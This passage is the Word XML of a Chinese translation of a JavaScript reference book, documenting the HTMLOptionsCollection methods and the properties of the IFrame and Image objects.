      <w:r>
        <w:t>是一个整数索引，将插入到这个索引指定的元素的前面。如果</w:t>
      </w:r>
      <w:r>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:t>是另一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>将被插入到这个元素前面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element item(unsigned long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>那儿继承了这个方法。它将返回指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处的元素，如果</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>出界了则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以用直接使用方括号检索集合的方式代替显示调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object nam</w:t>
      </w:r>
      <w:r>
        <w:t>edItem(string name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回集合中具有指定名字或</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素。如果没有匹配元素，它将返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。如果有一个</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>匹配，它将返回这个元素。如果有多个元素匹配，它将返回由这些元素组成的一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，可以通过使用</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>作为属性名的方式直接检索一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>而无须显式调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void remove(long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法移除集合中位于指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处的＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。如果调用时没带参数或者参数越界了</w:t>
      </w:r>
      <w:r>
        <w:t>，它可能会移除集合中的第一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="840" w:name="IFrame"/>
      <w:r>
        <w:t>IFrame</w:t>
      </w:r>
      <w:bookmarkEnd w:id="840"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞</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IFrame</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>或类似的查询函数来查找一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞，将得到一个</w:t>
      </w:r>
      <w:r>
        <w:t>IFrame</w:t>
      </w:r>
      <w:r>
        <w:t>对象。但是，如果通过</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>frames</w:t>
      </w:r>
      <w:r>
        <w:t>属性来查找＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞，或者将＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>作为包含的窗口的属性来查找，得到的将是该＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞代表的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly Document </w:t>
      </w:r>
      <w:r>
        <w:t>contentDocument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素包含的文档。如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中显示的文档来自不同的源，同源策略（见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）将会阻止对该文档的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly Window contentWindow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。（这个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:r>
        <w:t>又反向引用这个</w:t>
      </w:r>
      <w:r>
        <w:t>IFrame</w:t>
      </w:r>
      <w:r>
        <w:t>对象。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的高度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML height</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>名字。这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML name</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它的值可用于</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DOMSettableTokenList sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本属性反映</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>属性，允许将它作为一个字符串或者一组独立标记来查询及设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>属性指明浏览器应该对＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的不可信的内容实施额外的安全限制。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>但值为空，＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的内容将当做来自不同的源进行处理，将不允许运行脚本，不允许显示表单，也不允许改变它包含的窗口的地址。</w:t>
      </w:r>
      <w:r>
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:t>ndbox</w:t>
      </w:r>
      <w:r>
        <w:t>属性也可以设置为一个由空格分隔的标记列表，其中每一项都指定一个额外</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的安全限制。可用的标记有</w:t>
      </w:r>
      <w:r>
        <w:t>"allow-same-origin"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"allow-scripts"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"allow-forms"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"allow-top-navigation"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>写作本书的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>属性还没有广泛实现。更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean seamless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>seamless</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如果它的值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，浏览器将渲染对应＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的内容，让它看起来像是包含的文档的一部分。这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>，某种程度上，浏览器必须将包含的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式应用到＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的内容上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seamless</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分引入，在写作本书的时候还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string src</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性：它指定该框架内容的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string srcdoc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>srcdoc HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它以一个字符串的形式指定＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>srcdoc</w:t>
      </w:r>
      <w:r>
        <w:t>属性最近才作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分引入，在写作本书的时候还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的宽度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。这个属性反映对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML width</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="841" w:name="Image"/>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:bookmarkEnd w:id="841"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>节点、元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>对象以＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的形式，代表嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的一幅图片。出现在文档中的图片都被收集在</w:t>
      </w:r>
      <w:r>
        <w:t>document.images[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性是最有趣的一个。如果设置了这个属性，浏览器将加载并显示新的值指定的图片。可以利用这个特性实现一些可视化效果，比如图片翻转以及动画。示例请参见</w:t>
      </w:r>
      <w:r>
        <w:t>21.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过简单地使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.crea</w:t>
      </w:r>
      <w:r>
        <w:t>teElement()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来创建一个屏幕外</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>对象。注意，这个构造函数没有用于指明要加载的图片的参数：要加载图片，只须简单地设置对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性。要实际显示这张图片，只须将该</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>对象插入到文档中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>new Image([unsigned long width,unsigned long height])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>document.createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，像创建其他</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素一样创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>元素。不过，由于历史原因，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数用于完成同样的任务。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>参数，它们将为对应＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</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w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>元素也有下面的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可作为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>usemap</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ismap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean complete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有指</w:t>
      </w:r>
      <w:r>
        <w:t>定图片的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>，或者图片已经完全下载完成，则此属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图片在屏幕上显示的高度，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。设置这个值将改变图片的高度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly unsigned long naturalHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图片的固有高度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long naturalWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图片的固有宽度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string src</w:t>
      </w:r>
    </w:p>
